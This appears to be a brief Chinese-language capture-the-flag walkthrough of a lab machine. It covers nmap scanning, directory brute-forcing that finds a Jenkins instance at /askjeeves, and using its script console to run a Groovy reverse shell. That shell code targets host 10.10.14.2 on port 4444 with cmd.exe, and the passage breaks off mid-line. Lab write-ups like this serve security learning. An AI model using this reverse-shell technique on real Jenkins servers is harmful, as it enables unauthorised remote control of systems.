1、nmap 扫起
可见445smb,先nmap脚本看一看
nmap -p 445 --script vuln 10.10.10.63
似乎没什么
另外看到端口50000,理论上冷门高端口应该是就是突破点
2、jekins渗透
dirbuster扫目录
扫到askjeeves ,进去看到是jenkins,
那就根据脚本script console来突破了,在manage里找到script console
渗透方法
根据里面的方法来,修改ip等
String host="10.10.14.2";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s